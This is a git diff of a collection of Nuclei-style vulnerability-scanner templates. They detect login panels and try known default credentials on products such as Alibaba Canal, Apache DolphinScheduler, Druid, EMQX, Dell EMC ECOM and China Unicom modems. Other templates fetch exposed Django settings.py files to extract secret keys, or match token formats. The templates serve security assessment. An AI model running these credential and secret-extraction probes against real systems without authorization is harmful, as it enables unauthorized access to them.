https://github.com/BranchMetrics/android-branch-deep-linking-attribution/issues/74 tags: token,file file: diff --git a/poc/auth/brother-unauthorized-access-792.yaml b/poc/auth/brother-unauthorized-access-793.yaml similarity index 100% rename from poc/auth/brother-unauthorized-access-792.yaml rename to poc/auth/brother-unauthorized-access-793.yaml diff --git a/poc/auth/brother-unauthorized-access.yaml b/poc/auth/brother-unauthorized-access.yaml index c57d504fb3..f3e5d8283c 100644 --- a/poc/auth/brother-unauthorized-access.yaml +++ b/poc/auth/brother-unauthorized-access.yaml @@ -1,29 +1,25 @@ -id: brother-unauthorized-access +id: brother-unauthorized-access -info: - name: Brother Printer - author: pussycat0x - severity: medium - reference: https://www.exploit-db.com/ghdb/6889 - metadata: - max-request: 1 - tags: iot,printer,unauth +info: + name: Brother Printer + author: pussycat0x + severity: medium + reference: https://www.exploit-db.com/ghdb/6889 + tags: iot,printer,unauth -http: - - method: GET - path: - - "{{BaseURL}}/net/net/net.html" - - matchers-condition: and - matchers: - - type: word - words: - - "Brother Industries" - - "Network Status" - condition: and - - - type: status - status: - - 200 - -# digest: 4a0a00473045022100bc48aa1c015d7454147e9553d8c430f7a53e2888d1184923895f4f8c24f695e302201cf12a115bccdd3e47356f9ffe206676937b6d2d14841de4ba2ad78bd7a4da7f:922c64590222798bb761d5b6d8e72950 +requests: + - method: GET + path: + - "{{BaseURL}}/net/net/net.html" + + matchers-condition: and + matchers: + - type: word + words: + - "Brother Industries" + - "Network Status" + condition: and + + - type: status + status: + - 200 diff --git a/poc/auth/canal-default-login-846.yaml b/poc/auth/canal-default-login-846.yaml new file mode 100644 index 0000000000..6a73132d6f --- /dev/null +++ b/poc/auth/canal-default-login-846.yaml @@ -0,0 +1,44 @@ +id: canal-default-login + +info: + name: Alibaba Canal Default Login + author: pdteam + description: An Alibaba Canal default login was discovered. + severity: high + reference: + - https://github.com/alibaba/canal/wiki/ClientAdapter + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 + tags: alibaba,default-login + +requests: + - raw: + - | + POST /api/v1/user/login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + {"username":"{{user}}","password":"{{pass}}"} + + attack: pitchfork + payloads: + user: + - admin + pass: + - 123456 + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + condition: and + words: + - 'data":{"token"' + - '"code":20000' + +# Enhanced by mp on 2022/03/22 diff --git a/poc/auth/canal-default-login-848.yaml b/poc/auth/canal-default-login-848.yaml index 6a73132d6f..d9b73d5898 100644 --- a/poc/auth/canal-default-login-848.yaml +++ b/poc/auth/canal-default-login-848.yaml @@ -3,8 +3,8 @@ id: canal-default-login info: name: Alibaba Canal Default Login author: pdteam - description: An Alibaba Canal default login was discovered. severity: high + description: An Alibaba Canal default login was discovered. reference: - https://github.com/alibaba/canal/wiki/ClientAdapter classification: diff --git a/poc/auth/canal-default-login-849.yaml b/poc/auth/canal-default-login-849.yaml deleted file mode 100644 index a4c4a1b801..0000000000 --- a/poc/auth/canal-default-login-849.yaml +++ /dev/null @@ -1,35 +0,0 @@ -id: canal-default-login - -info: - name: Alibaba Canal Default Login - author: pdteam - severity: high - tags: alibaba,default-login - -requests: - - raw: - - | - POST /api/v1/user/login HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/json - - {"username":"{{user}}","password":"{{pass}}"} - - attack: pitchfork - payloads: - user: - - admin - pass: - - 123456 - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - condition: and - words: - - 'data":{"token"' - - '"code":20000' diff --git a/poc/auth/chinaunicom-default-login-906.yaml b/poc/auth/chinaunicom-default-login-906.yaml deleted file mode 100644 index 264ffd5f07..0000000000 --- a/poc/auth/chinaunicom-default-login-906.yaml +++ /dev/null @@ -1,38 +0,0 @@ -id: chinaunicom-default-login - -info: - name: China Unicom Modem Default Login - author: princechaddha - severity: high - description: Default login credentials were discovered for a China Unicom modem. - tags: chinaunicom,default-login - classification: - cwe-id: CWE-798 - -requests: - - raw: - - | - POST /cu.html HTTP/1.1 - Host: {{Hostname}} - - frashnum=&action=login&Frm_Logintoken=1&Username={{username}}&Password={{password}}&Username=&Password= - - attack: pitchfork - payloads: - username: - - CUAdmin - password: - - CUAdmin - - matchers-condition: and - matchers: - - type: status - status: - - 302 - - - type: word - words: - - "/menu.gch" - part: header - -# Enhanced by mp on 2022/03/03 diff --git a/poc/auth/chinaunicom-default-login-908.yaml b/poc/auth/chinaunicom-default-login-908.yaml index 8bc1986879..264ffd5f07 100644 --- a/poc/auth/chinaunicom-default-login-908.yaml +++ b/poc/auth/chinaunicom-default-login-908.yaml @@ -5,13 +5,11 @@ info: author: princechaddha severity: high description: Default login credentials were discovered for a China Unicom modem. + tags: chinaunicom,default-login classification: cwe-id: CWE-798 - metadata: - max-request: 1 - tags: chinaunicom,default-login -http: +requests: - raw: - | POST /cu.html HTTP/1.1 @@ -37,4 +35,4 @@ http: - "/menu.gch" part: header -# digest: 4a0a0047304502201dae0347d4fa926986d01f472884cbc0ff36f41fd9e810a538b97a2f0edcdaab022100c2a949b7e213eca0a23fd1fafbccefbc89468ef80a0af4fd072bbfc704faae11:922c64590222798bb761d5b6d8e72950 +# Enhanced by mp on 2022/03/03 diff --git a/poc/auth/chinaunicom-modem-default-credentials.yaml b/poc/auth/chinaunicom-modem-default-credentials.yaml index ed58f2f847..9498a9b6f9 100644 --- a/poc/auth/chinaunicom-modem-default-credentials.yaml +++ b/poc/auth/chinaunicom-modem-default-credentials.yaml @@ -1,11 +1,9 @@ id: chinaunicom-modem-default-credentials - info: name: Chinaunicom Modem Default Credentials author: princechaddha severity: high tags: chinaunicom,default-login - requests: - method: POST path: diff --git a/poc/auth/cisco-finesse-login-938.yaml b/poc/auth/cisco-finesse-login-938.yaml deleted file mode 100644 index 0944959e91..0000000000 --- a/poc/auth/cisco-finesse-login-938.yaml +++ /dev/null @@ -1,22 +0,0 @@ -id: cisco-finesse-login - -info: - name: Cisco Finesse Login - author: dhiyaneshDK - severity: info - reference: https://www.exploit-db.com/ghdb/6824 - tags: panel,cisco - -requests: - - method: GET - path: - - '{{BaseURL}}/desktop/container/landing.jsp?locale=en_US' - - matchers-condition: and - matchers: - - type: word - words: - - 'Sign in to Cisco Finesse' - - type: status - status: - - 200 diff --git a/poc/auth/cisco-finesse-login-940.yaml b/poc/auth/cisco-finesse-login-940.yaml new file mode 100644 index 0000000000..ad8938564b --- /dev/null +++ b/poc/auth/cisco-finesse-login-940.yaml @@ -0,0 +1,23 @@ +id: cisco-finesse-login + +info: + name: Cisco Finesse Login + author: dhiyaneshDK + severity: info + reference: + - https://www.exploit-db.com/ghdb/6824 + tags: panel,cisco + +requests: + - method: GET + path: + - '{{BaseURL}}/desktop/container/landing.jsp?locale=en_US' + + matchers-condition: and + matchers: + - type: word + words: + - 'Sign in to Cisco Finesse' + - type: status + status: + - 200 diff --git a/poc/auth/cisco-integrated-login-941.yaml b/poc/auth/cisco-integrated-login-941.yaml index 0804d5a189..5f716a0018 100644 --- a/poc/auth/cisco-integrated-login-941.yaml +++ b/poc/auth/cisco-integrated-login-941.yaml @@ -4,7 +4,8 @@ info: name: Cisco Integrated Management Controller Login author: dhiyaneshDK severity: info - reference: https://www.exploit-db.com/ghdb/3859 + reference: + - https://www.exploit-db.com/ghdb/3859 tags: panel,cisco requests: diff --git a/poc/auth/cisco-systems-login-973.yaml b/poc/auth/cisco-systems-login-973.yaml new file mode 100644 index 0000000000..25607b3bbf --- /dev/null +++ b/poc/auth/cisco-systems-login-973.yaml @@ -0,0 +1,25 @@ +id: cisco-systems-login + +info: + name: Cisco Systems Login + author: dhiyaneshDk + severity: info + tags: panel,cisco + metadata: + shodan-query: 'http.title:"Cisco Systems Login"' + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Cisco Systems Login" + + - type: status + status: + - 200 diff --git a/poc/auth/cisco-systems-login-975.yaml b/poc/auth/cisco-systems-login-975.yaml deleted file mode 100644 index 96ae7b9ee4..0000000000 --- a/poc/auth/cisco-systems-login-975.yaml +++ /dev/null @@ -1,32 +0,0 @@ -id: cisco-systems-login - -info: - name: Cisco Systems Login - author: dhiyaneshDk,idealphase - severity: info - metadata: - shodan-query: http.title:"Cisco Systems Login" - google-query: intitle:"Cisco Systems Login" - tags: panel,cisco - -requests: - - method: GET - path: - - "{{BaseURL}}" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "Cisco Systems Login" - - - type: status - status: - - 200 - - extractors: - - type: regex - group: 1 - regex: - - ' : DIR-850L' + - '"Hardware Version"' + - '"Firmware Version"' + condition: and \ No newline at end of file diff --git a/poc/auth/directadmin-login-panel-7000.yaml b/poc/auth/directadmin-login-panel-7000.yaml new file mode 100644 index 0000000000..a6e369bf31 --- /dev/null +++ b/poc/auth/directadmin-login-panel-7000.yaml @@ -0,0 +1,23 @@ +id: directadmin-login-panel +info: + name: DirectAdmin Login Panel Detect + author: idealphase + severity: info + description: A modern control panel's primary purpose is to effectively facilitate the routine management of your hosting infrastructure and present these tasks simply and intuitively to both the user and to you as the administrator. + reference: + - https://www.directadmin.com/whats_new.php + metadata: + shodan-query: title:"DirectAdmin Login" + tags: panel,directadmin +requests: + - method: GET + path: + - "{{BaseURL}}" + matchers-condition: and + matchers: + - type: word + words: + - "DirectAdmin Login" + - type: status + status: + - 200 diff --git a/poc/auth/django-secret-key.yaml b/poc/auth/django-secret-key.yaml deleted file mode 100644 index 8ec28a5f5e..0000000000 --- a/poc/auth/django-secret-key.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: django-secret-key - -info: - name: Django Secret Key - author: geeknik - severity: high - tags: django - -requests: - - method: GET - path: - - "{{BaseURL}}/settings.py" - - "{{BaseURL}}/app/settings.py" - - "{{BaseURL}}/django/settings.py" - - "{{BaseURL}}/settings/settings.py" - - "{{BaseURL}}/web/settings/settings.py" - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - part: body - words: - - "SECRET_KEY =" - - type: word - part: header - words: - - "text/html" - negative: true diff --git a/poc/auth/django-secret.key.yaml b/poc/auth/django-secret.key.yaml new file mode 100644 index 0000000000..d682cce94f --- /dev/null +++ b/poc/auth/django-secret.key.yaml @@ -0,0 +1,62 @@ +id: django-secret-key + +info: + name: Django Secret Key Exposure + author: geeknik,DhiyaneshDk + severity: high + description: | + The Django settings.py file containing a secret key was discovered. An attacker may use the secret key to bypass many security mechanisms and potentially obtain other sensitive configuration information (such as database password) from the settings file. + reference: https://docs.gitguardian.com/secrets-detection/detectors/specifics/django_secret_key + metadata: + verified: true + max-request: 7 + shodan-query: html:settings.py + comments: 'This template downloads the manage.py file to check whether it contains line such as: `os.environ.setdefault("DJANGO_SETTINGS_MODULE", "APP_NAME.settings")` if it does, we extract the APP_NAME to know in what folder to look for the settings.py file.' + tags: django,exposure,files + +http: + - method: GET + path: + - "{{BaseURL}}/manage.py" + - "{{BaseURL}}/settings.py" + - "{{BaseURL}}/app/settings.py" + - "{{BaseURL}}/django/settings.py" + - "{{BaseURL}}/settings/settings.py" + - "{{BaseURL}}/web/settings/settings.py" + - "{{BaseURL}}/{{app_name}}/settings.py" + + stop-at-first-match: true + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "SECRET_KEY =" + + - type: word + part: header + words: + - "text/html" + negative: true + + - type: status + status: + - 200 + + extractors: + - type: regex + part: body + group: 1 + regex: + - '"DJANGO_SECRET_KEY", "(.*)"' + + - type: regex + part: body + internal: true + name: app_name + group: 1 + regex: + - "os.environ.setdefault\\([\"']DJANGO_SETTINGS_MODULE[\"'],\\s[\"']([a-zA-Z-_0-9]*).settings[\"']\\)" + +# digest: 4a0a00473045022100b9f99aa21141aff5a2e32d9d17a38a880455bee51e9d5cb86222bbadac6086b402203b18b6d4563233114ccc027031dd1a9e01f8d491147509d60836f496edee6d8b:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/dolphinscheduler-default-login-7072.yaml b/poc/auth/dolphinscheduler-default-login-7072.yaml index c77249a51f..139ea8c34e 100644 --- a/poc/auth/dolphinscheduler-default-login-7072.yaml +++ b/poc/auth/dolphinscheduler-default-login-7072.yaml @@ -1,18 +1,20 @@ id: dolphinscheduler-default-login + info: name: Apache DolphinScheduler Default Login author: For3stCo1d - severity: high description: Apache DolphinScheduler default admin credentials were discovered. - reference: - - https://github.com/apache/dolphinscheduler + severity: high + reference: https://github.com/apache/dolphinscheduler + metadata: + shodan-query: http.title:"DolphinScheduler" classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 + cve-id: cwe-id: CWE-522 - metadata: - shodan-query: http.title:"DolphinScheduler" tags: apache,dolphinscheduler,default-login,oss + requests: - raw: - | @@ -21,12 +23,14 @@ requests: Content-Type: application/x-www-form-urlencoded userName={{user}}&userPassword={{pass}} + attack: pitchfork payloads: user: - admin pass: - dolphinscheduler123 + matchers-condition: and matchers: - type: word @@ -35,6 +39,7 @@ requests: - '"msg":"login success"' - '"sessionId":' condition: and + - type: status status: - 200 diff --git a/poc/auth/dolphinscheduler-default-login-7073.yaml b/poc/auth/dolphinscheduler-default-login-7073.yaml new file mode 100644 index 0000000000..9c25ef84bb --- /dev/null +++ b/poc/auth/dolphinscheduler-default-login-7073.yaml @@ -0,0 +1,48 @@ +id: dolphinscheduler-default-login + +info: + name: Apache DolphinScheduler Default Login + author: For3stCo1d + severity: high + description: Apache DolphinScheduler default admin credentials were discovered. + reference: + - https://github.com/apache/dolphinscheduler + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 + metadata: + max-request: 1 + shodan-query: http.title:"DolphinScheduler" + tags: apache,dolphinscheduler,default-login,oss + +http: + - raw: + - | + POST /dolphinscheduler/login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + userName={{user}}&userPassword={{pass}} + + attack: pitchfork + payloads: + user: + - admin + pass: + - dolphinscheduler123 + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"msg":"login success"' + - '"sessionId":' + condition: and + + - type: status + status: + - 200 + +# digest: 4a0a0047304502207145a1c47f315245ad5c976b1b397ac9505b36481698a247e81ecd41d4c6f76f022100aa4e7fd43be6c89acf664d53e830f9b9b4d47d33900d3bd45b34ff1433bf6104:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/druid-default-login-7096.yaml b/poc/auth/druid-default-login-7096.yaml index 1a787c7ba6..934ad5bd05 100644 --- a/poc/auth/druid-default-login-7096.yaml +++ b/poc/auth/druid-default-login-7096.yaml @@ -4,9 +4,9 @@ info: author: pikpikcu severity: high description: Apache Druid default login information (admin/admin) was discovered. + tags: druid,default-login classification: cwe-id: CWE-798 - tags: druid,default-login requests: - raw: - | diff --git a/poc/auth/druid-default-login.yaml b/poc/auth/druid-default-login.yaml index 934ad5bd05..22698fdfe0 100644 --- a/poc/auth/druid-default-login.yaml +++ b/poc/auth/druid-default-login.yaml @@ -1,13 +1,17 @@ id: druid-default-login + info: - name: Apache Druid Default Login + name: Alibaba Druid Monitor Default Login author: pikpikcu severity: high - description: Apache Druid default login information (admin/admin) was discovered. - tags: druid,default-login + description: Alibaba Druid Monitor default login information (admin/admin) was discovered. classification: cwe-id: CWE-798 -requests: + metadata: + max-request: 2 + tags: druid,alibaba,default-login + +http: - raw: - | POST /druid/submitLogin HTTP/1.1 @@ -19,19 +23,22 @@ requests: Host: {{Hostname}} loginUsername={{username}}&loginPassword={{password}} + payloads: username: - admin password: - admin attack: pitchfork + matchers-condition: and matchers: - type: status status: - 200 + - type: regex regex: - "^success$" -# Enhanced by mp on 2022/03/03 +# digest: 4a0a0047304502203dfdfa52e3c78cf6b97da6c9696cbd67765e254ee413a412325e57b4cd454ef0022100d443785f6f2d4979660305541336a2f74f56b2c5efacb43b07928e7831b0bc03:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/dubbo-admin-default-login.yaml b/poc/auth/dubbo-admin-default-login-7120.yaml similarity index 100% rename from poc/auth/dubbo-admin-default-login.yaml rename to poc/auth/dubbo-admin-default-login-7120.yaml diff --git a/poc/auth/dubbo-admin-default-login-7121.yaml b/poc/auth/dubbo-admin-default-login-7121.yaml index f5f6605a54..8d78175d78 100644 --- a/poc/auth/dubbo-admin-default-login-7121.yaml +++ b/poc/auth/dubbo-admin-default-login-7121.yaml @@ -1,18 +1,28 @@ id: dubbo-admin-default-login + info: - name: Dubbo Admin Default Login + name: Apache Dubbo - Default Admin Discovery author: ritikchaddha severity: high + description: Apache Dubbo default admin credentials were discovered. reference: - https://www.cnblogs.com/wishwzp/p/9438658.html + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 + metadata: + max-request: 2 tags: dubbo,apache,default-login -requests: + +http: - raw: - | GET / HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded Authorization: Basic {{base64(username + ':' + password)}} + attack: pitchfork payloads: username: @@ -21,6 +31,7 @@ requests: password: - guest - root + matchers-condition: and matchers: - type: word @@ -29,6 +40,9 @@ requests: - "/sysinfo/versions" - "{{username}}', '/logout')" condition: and + - type: status status: - 200 + +# digest: 490a00463044022002689a9cad9b9029a66dd25206f2746f2953562839d6e5d8e42fe9b4765a948b02203ee35baa4941a2d5023486da3377f591f1b9d5f39c93e75c4db342d0aafa2c2f:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/dvwa-default-login-7129.yaml b/poc/auth/dvwa-default-login-7129.yaml index 34dd333c57..eb0669859d 100644 --- a/poc/auth/dvwa-default-login-7129.yaml +++ b/poc/auth/dvwa-default-login-7129.yaml @@ -3,12 +3,7 @@ info: name: DVWA Default Login author: pdteam severity: critical - description: Damn Vulnerable Web App (DVWA) is a test application for security professionals. The hard coded credentials are part of a security testing scenario. tags: dvwa,default-login - reference: - - https://opensourcelibs.com/lib/dvwa - classification: - cwe-id: CWE-798 requests: - raw: - | @@ -49,5 +44,3 @@ requests: - type: word words: - "You have logged in as 'admin'" - -# Enhanced by mp on 2022/03/03 diff --git a/poc/auth/dvwa-default-login-7127.yaml b/poc/auth/dvwa-default-login.yaml similarity index 100% rename from poc/auth/dvwa-default-login-7127.yaml rename to poc/auth/dvwa-default-login.yaml diff --git a/poc/auth/dvwa-headless-automatic-login-7130.yaml b/poc/auth/dvwa-headless-automatic-login-7130.yaml deleted file mode 100644 index cb7db2b51c..0000000000 --- a/poc/auth/dvwa-headless-automatic-login-7130.yaml +++ /dev/null @@ -1,42 +0,0 @@ -id: dvwa-headless-automatic-login -info: - name: DVWA Headless Automatic Login - author: pdteam - severity: high - tags: headless -headless: - - steps: - - args: - url: "{{BaseURL}}/login.php" - action: navigate - - action: waitload - - args: - by: x - xpath: /html/body/div/div[2]/form/fieldset/input - action: click - - action: waitload - - args: - by: x - value: admin - xpath: /html/body/div/div[2]/form/fieldset/input - action: text - - args: - by: x - xpath: /html/body/div/div[2]/form/fieldset/input[2] - action: click - - action: waitload - - args: - by: x - value: password - xpath: /html/body/div/div[2]/form/fieldset/input[2] - action: text - - args: - by: x - xpath: /html/body/div/div[2]/form/fieldset/p/input - action: click - - action: waitload - matchers: - - part: resp - type: word - words: - - "You have logged in as" diff --git a/poc/auth/dvwa-headless-automatic-login-7131.yaml b/poc/auth/dvwa-headless-automatic-login-7131.yaml new file mode 100644 index 0000000000..a2e8ccd0c2 --- /dev/null +++ b/poc/auth/dvwa-headless-automatic-login-7131.yaml @@ -0,0 +1,42 @@ +id: dvwa-headless-automatic-login +info: + name: DVWA Headless Automatic Login + author: pdteam + severity: high + tags: headless,dvwa +headless: + - steps: + - args: + url: "{{BaseURL}}/login.php" + action: navigate + - action: waitload + - args: + by: x + xpath: /html/body/div/div[2]/form/fieldset/input + action: click + - action: waitload + - args: + by: x + value: admin + xpath: /html/body/div/div[2]/form/fieldset/input + action: text + - args: + by: x + xpath: /html/body/div/div[2]/form/fieldset/input[2] + action: click + - action: waitload + - args: + by: x + value: password + xpath: /html/body/div/div[2]/form/fieldset/input[2] + action: text + - args: + by: x + xpath: /html/body/div/div[2]/form/fieldset/p/input + action: click + - action: waitload + matchers: + - part: resp + type: word + words: + - "You have logged in as" diff --git a/poc/auth/dvwa-headless-automatic-login-7133.yaml b/poc/auth/dvwa-headless-automatic-login-7133.yaml index a2e8ccd0c2..bd48c62f5e 100644 --- a/poc/auth/dvwa-headless-automatic-login-7133.yaml +++ b/poc/auth/dvwa-headless-automatic-login-7133.yaml @@ -1,9 +1,11 @@ id: dvwa-headless-automatic-login + info: name: DVWA Headless Automatic Login author: pdteam severity: high tags: headless,dvwa + headless: - steps: - args: @@ -35,8 +37,15 @@ headless: xpath: /html/body/div/div[2]/form/fieldset/p/input action: click - action: waitload + + matchers-condition: or matchers: - part: resp type: word words: - "You have logged in as" + + - part: resp + type: word + words: + - "First time using DVWA" diff --git a/poc/auth/dynatrace-token-7145.yaml b/poc/auth/dynatrace-token-7145.yaml new file mode 100644 index 0000000000..3fe0f4cf8f --- /dev/null +++ b/poc/auth/dynatrace-token-7145.yaml @@ -0,0 +1,13 @@ +id: dynatrace-token +info: + name: Dynatrace Token + author: gaurang + severity: high + tags: token,file +file: + - extensions: + - all + extractors: + - type: regex + regex: + - "dt0[a-zA-Z]{1}[0-9]{2}\\.[A-Z0-9]{24}\\.[A-Z0-9]{64}" diff --git a/poc/auth/dynatrace-token-7146.yaml b/poc/auth/dynatrace-token-7146.yaml deleted file mode 100644 index 3ad533dd3f..0000000000 --- a/poc/auth/dynatrace-token-7146.yaml +++ /dev/null @@ -1,16 +0,0 @@ -id: dynatrace-token - -info: - name: Dynatrace Token - author: gaurang - severity: high - tags: token,file - -file: - - extensions: - - all - - extractors: - - type: regex - regex: - - "dt0[a-zA-Z]{1}[0-9]{2}\\.[A-Z0-9]{24}\\.[A-Z0-9]{64}" \ No newline at end of file diff --git a/poc/auth/emcecom-default-login-7211.yaml b/poc/auth/emcecom-default-login-7211.yaml deleted file mode 100644 index 1ad75f5e1f..0000000000 --- a/poc/auth/emcecom-default-login-7211.yaml +++ /dev/null @@ -1,43 +0,0 @@ -id: dell-emc-ecom-default-login - -info: - name: Dell EMC ECOM Default Login - author: Techryptic (@Tech) - severity: high - description: Dell EMC ECOM default login information "(admin:#1Password)" was discovered. - remediation: To resolve this issue, perform a "remsys" and "addsys" with no other operations occurring (reference the appropriate SMI-S provider documentation) and specify the new password when re-adding the array. If there are issues performing the "addsys" operation, it is recommended to restart the management server on each SP. - reference: https://www.dell.com/support/kbdoc/en-za/000171270/vipr-controller-operation-denied-by-clariion-array-you-are-not-privileged-to-perform-the-requested-operation - tags: dell,emc,ecom,default-login - classification: - cwe-id: CWE-798 - -requests: - - raw: - - | - GET / HTTP/1.1 - Host: {{Hostname}} - Authorization: Basic {{base64(username + ':' + password)}} - - payloads: - username: - - root - password: - - calvin - attack: pitchfork - - matchers-condition: and - matchers: - - type: word - words: - - "Set-Cookie: ECOMSecurity" - part: header - - - type: word - words: - - "Welcome to ECOM" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/03/03 diff --git a/poc/auth/emcecom-default-login-7212.yaml b/poc/auth/emcecom-default-login-7212.yaml index 199ac75ebe..ce86884996 100644 --- a/poc/auth/emcecom-default-login-7212.yaml +++ b/poc/auth/emcecom-default-login-7212.yaml @@ -3,12 +3,9 @@ info: name: Dell EMC ECOM Default Login author: Techryptic (@Tech) severity: high - description: Dell EMC ECOM default login information "(admin:#1Password)" was discovered. - remediation: To resolve this issue, perform a "remsys" and "addsys" with no other operations occurring (reference the appropriate SMI-S provider documentation) and specify the new password when re-adding the array. If there are issues performing the "addsys" operation, it is recommended to restart the management server on each SP. + description: Default Login of admin:#1Password on Dell EMC ECOM application. reference: https://www.dell.com/support/kbdoc/en-za/000171270/vipr-controller-operation-denied-by-clariion-array-you-are-not-privileged-to-perform-the-requested-operation tags: dell,emc,ecom,default-login - classification: - cwe-id: CWE-798 requests: - raw: - | @@ -33,5 +30,3 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/03/03 diff --git a/poc/auth/emqx-default-login-7222.yaml b/poc/auth/emqx-default-login-7222.yaml new file mode 100644 index 0000000000..9185a5cdd3 --- /dev/null +++ b/poc/auth/emqx-default-login-7222.yaml @@ -0,0 +1,35 @@ +id: emqx-default-login +info: + name: Emqx Default Admin Login + author: For3stCo1d + severity: high + description: Emqx default admin credentials were discovered. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 + metadata: + shodan-query: http.favicon.hash:"-670975485" + tags: emqx,default-login +requests: + - raw: + - | + POST /api/v4/auth HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + {"username":"{{user}}","password":"{{pass}}"} + attack: pitchfork + payloads: + user: + - admin + pass: + - public + matchers: + - type: dsl + dsl: + - body == "{\"code\":0}" + - status_code == 200 + condition: and + +# Enhanced by mp on 2022/03/28 diff --git a/poc/auth/emqx-default-login.yaml b/poc/auth/emqx-default-login.yaml index 9185a5cdd3..792fb8c64b 100644 --- a/poc/auth/emqx-default-login.yaml +++ b/poc/auth/emqx-default-login.yaml @@ -4,12 +4,13 @@ info: author: For3stCo1d severity: high description: Emqx default admin credentials were discovered. + metadata: + shodan-query: 'http.favicon.hash:"-670975485"' classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 + cve-id: cwe-id: CWE-522 - metadata: - shodan-query: http.favicon.hash:"-670975485" tags: emqx,default-login requests: - raw: diff --git a/poc/auth/ems-login-panel-7223.yaml b/poc/auth/ems-login-panel-7223.yaml deleted file mode 100644 index a829cccc20..0000000000 --- a/poc/auth/ems-login-panel-7223.yaml +++ /dev/null @@ -1,18 +0,0 @@ -id: ems-login-panel -info: - name: EMS Login page detection - author: __Fazal - severity: info - tags: panel,ems,login -requests: - - method: GET - path: - - '{{BaseURL}}/EMSWebClient/Login.aspx' - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - words: - - "EMS Web Client - Login" diff --git a/poc/auth/enable-secret-for-password-user-and-.yaml b/poc/auth/enable-secret-for-password-user-and-.yaml index 3311fd4078..f178b8c71d 100644 --- a/poc/auth/enable-secret-for-password-user-and-.yaml +++ b/poc/auth/enable-secret-for-password-user-and-.yaml @@ -9,7 +9,6 @@ info: reference: - https://www.cisco.com/E-Learning/bulk/public/tac/cim/cib/using_cisco_ios_software/cmdrefs/service_timestamps.htm tags: cisco,config-audit,cisco-switch,file,router - file: - extensions: - conf @@ -24,4 +23,5 @@ file: - type: word words: - "configure terminal" -# digest: 4a0a00473045022100dac4f6aa319499a727b4ee08faa1fe35473c0e8c1c5ec166d3b5ef62f267800c0220547bd47bb206453c355eabcd9eb490c10ff6d4f02f10029b954d0d4befffaef0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502204f6beffea112852a6e7dbf11a7fd8fe97da58385e475b5d3485a12678568107f022100afe3edd05b216cb7a94d9080430e939c95b36d13f0195516681a1e2b31874aec:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/epmp-login-7229.yaml b/poc/auth/epmp-login-7229.yaml index d8a3b800ba..faccd694fc 100644 --- a/poc/auth/epmp-login-7229.yaml +++ b/poc/auth/epmp-login-7229.yaml @@ -4,8 +4,7 @@ info: name: ePMP 2000 Login author: dhiyaneshDk severity: info - reference: - - https://www.exploit-db.com/ghdb/6826 + reference: https://www.exploit-db.com/ghdb/6826 tags: iot,panel requests: diff --git a/poc/auth/epmp-login.yaml b/poc/auth/epmp-login.yaml deleted file mode 100644 index faccd694fc..0000000000 --- a/poc/auth/epmp-login.yaml +++ /dev/null @@ -1,24 +0,0 @@ -id: epmp-login - -info: - name: ePMP 2000 Login - author: dhiyaneshDk - severity: info - reference: https://www.exploit-db.com/ghdb/6826 - tags: iot,panel - -requests: - - method: GET - path: - - "{{BaseURL}}" - - matchers-condition: and - matchers: - - type: word - words: - - 'ePMP' - part: body - - - type: status - status: - - 200 diff --git a/poc/auth/etcd-keys-7261.yaml b/poc/auth/etcd-keys-7261.yaml deleted file mode 100644 index af038ce2b3..0000000000 --- a/poc/auth/etcd-keys-7261.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: etcd-keys -info: - name: Etcd Keys - author: sharath - severity: info - description: Scans for etcd keys - tags: tech,k8s,kubernetes,devops,etcd - -requests: - - method: GET - path: - - "{{BaseURL}}/v2/keys/" - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - part: body - words: - - '"node":' - - '"key":' - condition: and \ No newline at end of file diff --git a/poc/auth/etcd-keys-7262.yaml b/poc/auth/etcd-keys-7262.yaml deleted file mode 100644 index b28510d4e7..0000000000 --- a/poc/auth/etcd-keys-7262.yaml +++ /dev/null @@ -1,26 +0,0 @@ -id: etcd-keys - -info: - name: Etcd Keys - author: sharath - severity: info - description: Scans for etcd keys - tags: tech,k8s,kubernetes,devops,etcd - -requests: - - method: GET - path: - - "{{BaseURL}}/v2/keys/" - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - part: body - words: - - '"node":' - - '"key":' - condition: and \ No newline at end of file diff --git a/poc/auth/etcd-keys.yaml b/poc/auth/etcd-keys.yaml index f96e70795c..b28510d4e7 100644 --- a/poc/auth/etcd-keys.yaml +++ 